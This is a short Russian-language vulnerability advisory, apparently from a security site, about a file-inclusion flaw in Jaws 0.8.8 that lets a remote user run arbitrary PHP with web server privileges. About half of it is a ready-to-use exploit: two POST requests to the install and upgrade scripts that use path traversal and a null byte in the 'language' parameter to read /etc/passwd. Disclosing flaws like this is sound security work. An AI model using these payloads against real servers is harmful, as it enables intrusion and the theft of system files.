Программа: Jaws 0.8.8

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных сценарием index.php. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

POST /upgrade/index.php
language=../../../../../../../../../../../../etc/passwd%00

POST /install/index.php
language=../../../../../../../../../../../../etc/passwd%00



Оставить мнение